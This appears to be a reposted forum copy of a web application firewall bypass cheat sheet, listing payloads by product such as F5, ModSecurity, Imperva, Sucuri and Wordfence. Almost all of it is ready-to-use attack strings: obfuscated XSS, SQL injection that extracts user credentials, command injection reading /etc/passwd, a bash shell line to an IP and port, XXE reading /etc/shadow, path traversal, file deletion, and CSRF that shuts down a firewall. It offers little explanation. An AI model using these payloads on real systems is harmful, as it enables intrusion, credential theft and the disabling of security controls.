1. <span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;"><--</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(152, 195, 121); color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 72px;">`<img/src=`</span><span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;"> onerror=confirm</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(152, 195, 121); color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 13px;">``</span><span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">> --!></span>

复制代码

XSS Bypass by @Shiva Krishna

1. javascript:{alert`0`}

复制代码

XSS Bypass by @Brute Logic

1. <base href=//knoxss.me?

复制代码

XSS Bypass by @RenwaX23 (Chrome only)

1. <j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
   

复制代码

RCE Payload Detection Bypass by @theMiddle

1. cat$u+/etc$u/passwd$u
   
2. /bin$u/bash$u <ip> <port>
   
3. ";cat+/etc/passwd+#

复制代码

Comodo
XSS Bypass by @0xInfection

1. <input/oninput='new Function`confir\u006d\`0\``'>
   
2. <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme

复制代码

SQLi by @WAFNinja

1. 0 union/**/select 1,version(),@@datadir

复制代码

DotDefender

Firewall disable by (v5.0) by @hyp3rlinx

1. PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
   
2. <enabled>false</enabled>

复制代码

Remote Command Execution (v3.8-5) by @John Dos

1. POST /dotDefender/index.cgi HTTP/1.1
   
2. Host: 172.16.159.132
   
3. User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
   
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   
5. Accept-Language: en-us,en;q=0.5
   
6. Accept-Encoding: gzip,deflate
   
7. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
   
8. Keep-Alive: 300
   
9. Connection: keep-alive
   
10. Authorization: Basic YWRtaW46
    
11. Cache-Control: max-age=0
    
12. Content-Type: application/x-www-form-urlencoded
    
13. Content-Length: 95
    
14. 
    
15. sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15

复制代码

Persistent XSS (v4.0) by @EnableSecurity

1. GET /c?a=<script> HTTP/1.1
   
2. Host: 172.16.159.132
   
3. User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
   
4. rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
   
5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   
6. Accept-Language: en-us,en;q=0.5
   
7. Accept-Encoding: gzip,deflate
   
8. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
   
9. <script>alert(1)</script>: aa
   
10. Keep-Alive: 300

复制代码

R-XSS Bypass by @WAFNinja

1. <svg/onload=prompt(1);>
   
2. <isindex action="javas&tab;cript:alert(1)" type=image>
   
3. <marquee/onstart=confirm(2)>
   

复制代码

XSS Bypass by @0xInfection

1. <p draggable=True ondragstart=prompt()>alert
   
2. <bleh/ondragstart=        parent        ['open']        ()%20draggable=True>dragme
   
3. GET - XSS Bypass (v4.02) by @DavidK
   
4. 
   
5. /search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
   
6. 
   
7. <img src="WTF" onError="{var
   
8. {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
   
9. h%2Bn)(/0wn3d/.source)" />

复制代码

POST - XSS Bypass (v4.02) by @DavidK

1. <img src="WTF" onError="{var
   
2. {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
   
3. .source)" />

复制代码

clave XSS (v4.02) by @DavidK

1. /?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
   

复制代码

Fortinet Fortiwebpcre_expression unvaidated XSS by @Benjamin Mejri

1. /waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
   
2. /waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0

复制代码

CSP Bypass by @Binar10

POST Type Query

1. POST /<path>/login-app.aspx HTTP/1.1
   
2. Host: <host>
   
3. User-Agent: <any valid user agent string>
   
4. Accept-Encoding: gzip, deflate
   
5. Connection: keep-alive
   
6. Content-Type: application/x-www-form-urlencoded
   
7. Content-Length: <the content length must be at least 2399 bytes>
   
8. 
   
9. var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>

复制代码

GET Type Query

1. http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>

复制代码

F5 ASMXSS Bypass by @WAFNinja

1. <table background="javascript:alert(1)"></table>
   
2. "/><marquee onfinish=confirm(123)>a</marquee>

复制代码

F5 BIG-IP

XSS Bypass by @WAFNinja

1. <body style="height:1000px" onwheel="[DATA]">
   
2. <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
   
3. <body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
   
4. <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">

复制代码

XSS Bypass by @Aatif Khan

1. <body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
   
2. <div contextmenu="xss">Right-Click Here<menu id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“>

复制代码

report_type XSS by @NNPoster

1. https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+
   

复制代码

POST Based XXE by @Anonymous

1. POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
   
2. Host: bigip
   
3. Cookie: BIGIPAuthCookie=*VALID_COOKIE*
   
4. Content-Length: 143
   
5. 
   
6. <?xml version="1.0" encoding='utf-8' ?>
   
7. <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
   
8. <message><dialogueType>&e;</dialogueType></message>

复制代码

Directory Traversal by @Anastasios Monachos

Read Arbitrary File

1. /tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd

复制代码

Delete Arbitrary File

1. POST /tmui/Control/form HTTP/1.1
   
2. Host: site.com
   
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
   
4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   
5. Accept-Language: en-US,en;q=0.5
   
6. Accept-Encoding: gzip, deflate
   
7. Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
   
8. Content-Type: application/x-www-form-urlencoded
   
9. 
   
10. _form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete

复制代码

F5 FirePassSQLi Bypass from @Anonymous

1. state=%2527+and+
   
2. (case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
   
3. BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+

复制代码

ModSecurityRCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1)

1. ;+$u+cat+/etc$u/passwd$u
   

复制代码

RCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1)

1. ;+$u+cat+/etc$u/passwd+\#
   

复制代码

RCE Payloads for PL1 and PL2 by @theMiddle (v3.0)

1. /???/??t+/???/??ss??
   

复制代码

RCE Payloads for PL3 by @theMiddle (v3.0)

1. /?in/cat+/et?/passw?

复制代码

SQLi Bypass by @Johannes Dahse (v2.2)

1. 0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
   

复制代码

SQLi Bypass by @Yuri Goltsev (v2.2)

1. 1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')
   

复制代码

SQLi Bypass by @Ahmad Maulana (v2.2)

1. 1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-
   

复制代码

SQLi Bypass by @Travis Lee (v2.2)

1. amUserId=1 union select username,password,3,4 from users
   

复制代码

SQLi Bypass by @Roberto Salgado (v2.2)

1. %0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201
   

复制代码

SQLi Bypass by @Georgi Geshev (v2.2)

1. 1%0bAND(SELECT%0b1%20FROM%20mysql.x)
   

复制代码

SQLi Bypass by @SQLMap Devs (v2.2)

1. %40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29
   

复制代码

SQLi Bypass by @HackPlayers (v2.2)

1. %0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201
   

复制代码

Imperva

Imperva SecureSphere 13 - Remote Command Execution by @rsp3ar

XSS Bypass by @David Y

1. <svg onload\r\n=$.globalEval("al"+"ert()");>

复制代码

XSS Bypass by @Emad Shanab

1. <svg/onload=self[`aler`%2b`t`]`1`>
   
2. anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz

复制代码

XSS Bypass by @i_bo0om

1. <iframe/onload='this["src"]="javas        cript:al"+"ert``"';>
   
2. <img/src=q onerror='new Function`al\ert\`1\``'>

复制代码

XSS Bypass by @c0d3g33k

1. <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
   

复制代码

SQLi Bypass by @DRK1WI

1. 15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
   

复制代码

SQLi by @Giuseppe D’Amore

1. stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
   

复制代码

Imperva SecureSphere <= v13 - Privilege Escalation by @0x09AL

Kona SiteDefender

HTML Injection by @sp1d3rs

1. %2522%253E%253Csvg%2520height%3D%2522100%2522%2520width%3D%2522100%2522%253E%2520%253Ccircle%2520cx%3D%252250%2522%2520cy%3D%252250%2522%2520r%3D%252240%2522%2520stroke%3D%2522black%2522%2520stroke-width%3D%25223%2522%2520fill%3D%2522red%2522%2520%2F%253E%2520%253C%2Fsvg%253E
   

复制代码

XSS Bypass by @Jonathan Bouman

1. <body%20alt=al%20lang=ert%20onmouseenter="top['al'+lang](/PoC%20XSS%20Bypass%20by%20Jonathan%20Bouman/)"
   

复制代码

XSS Bypass by @zseano

1. ?"></script><base%20c%3D=href%3Dhttps:\mysite>
   

复制代码

XSS Bypass by @0xInfection

1. <abc/onmouseenter=confirm%60%60>
   

复制代码

XSS Bypass by @sp1d3rs

1. %2522%253E%253C%2Fdiv%253E%253C%2Fdiv%253E%253Cbrute%2520onbeforescriptexecute%3D%2527confirm%28document.domain%29%2527%253E
   

复制代码

XSS Bypass by @Frans Rosén

1. <style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
   

复制代码

XSS Bypass by @Ishaq Mohammed

1. <marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
   

复制代码

Profense

GET Type CSRF Attack by @Michael Brooks (>= v.2.6.2)

Turn off Proface Machine

1. <img src=https://host:2000/ajax.html?action=shutdown>

复制代码

Add a proxy

1. <img src=https://10.1.1.199:2000/ajax.html?vhost_proto=http&vhost=vhost.com&vhost_port=80&rhost_proto=http&rhost=10.1.1.1&rhost_port=80&mode_pass=on&xmle=on&enable_file_upload=on&static_passthrough=on&action=add&do=save>
   

复制代码

XSS Bypass by @Michael Brooks (>= v.2.6.2)

1. https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>"<script>alert(document.cookie)</script>
   

复制代码

XSS Bypass by @EnableSecurity (>= v2.4)

1. %3CEvil%20script%20goes%20here%3E=%0AByPass
   
2. %3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

复制代码

QuickDefense

XSS Bypass by @WAFNinja

1. ?<input type="search" onsearch="aler\u0074(1)">
   
2. <details ontoggle=alert(1)>

复制代码

Sucuri

Smuggling RCE Payloads by @theMiddle

1. /???/??t+/???/??ss??
   

复制代码

Obfuscating RCE Payloads by @theMiddle

1. ;+cat+/e'tc/pass'wd
   
2. c\\a\\t+/et\\c/pas\\swd

复制代码

XSS Bypass by @Luka

1. "><input/onauxclick="[1].map(prompt)">

复制代码

XSS Bypass by @Brute Logic

1. data:text/html,<form action=https://brutelogic.com.br/xss-cp.php method=post>
   
2. <input type=hidden name=a value="<img/src=//knoxss.me/yt.jpg onpointerenter=alert`1`>">
   
3. <input type=submit></form>

复制代码

URLScan

Directory Traversal by @ZeQ3uL (<= v3.1) (Only on ASP.NET)

1. http://host.com/test.asp?file=.%./bla.txt
   

复制代码

WebARXCross Site Scripting by @0xInfection

1. <a69/onauxclick=open()>rightclickhere

复制代码

WebKnightCross Site Scripting by @WAFNinja

1. <isindex action=j        a        vas        c        r        ipt:alert(1) type=image>
   
2. <marquee/onstart=confirm(2)>
   
3. <details ontoggle=alert(1)>
   
4. <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
   
5. <img src=x onwheel=prompt(1)>

复制代码

SQLi by @WAFNinja

1. 0 union(select 1,username,password from(users))
   
2. 0 union(select 1,@@hostname,@@datadir)

复制代码

XSS Bypass by @Aatif Khan (v4.1)

1. <details ontoggle=alert(1)>
   
2. <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">

复制代码

SQLi Bypass by @ZeQ3uL

1. 10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
   

复制代码

WordfenceXSS Bypass by @brute Logic

1. <a href=javascript:alert(1)>
   

复制代码

XSS Bypass by @0xInfection

1. <a/**/href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:/**/alert()/**/>click
   

复制代码

HTML Injection by @Voxel

1. http://host/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
   

复制代码

XSS Exploit by @MustLive (>= v3.3.5)

1. <html>
   
2. <head>
   
3. <title>Wordfence Security XSS exploit (C) 2012 MustLive.
   
4. http://websecurity.com.ua</title>
   
5. </head>
   
6. <body onLoad="document.hack.submit()">
   
7. <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
   
8. <input type="hidden" name="email"
   
9. value="<script>alert(document.cookie)</script>">
   
10. </form>
    
11. </body>
    
12. </html>

复制代码

Other XSS Bypasses

1. <meter onmouseover="alert(1)"
   
2. '">><div><meter onmouseover="alert(1)"</div>"
   
3. >><marquee loop=1 width=0 onfinish=alert(1)>

复制代码

Apache Generic

Writing method type in lowercase by @i_bo0om

1. get /login HTTP/1.1
   
2. Host: favoritewaf.com
   
3. User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

复制代码

IIS Generic

Tabs before method by @i_bo0om

1. GET /login.php HTTP/1.1
   
2. Host: favoritewaf.com
   
3. User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

复制代码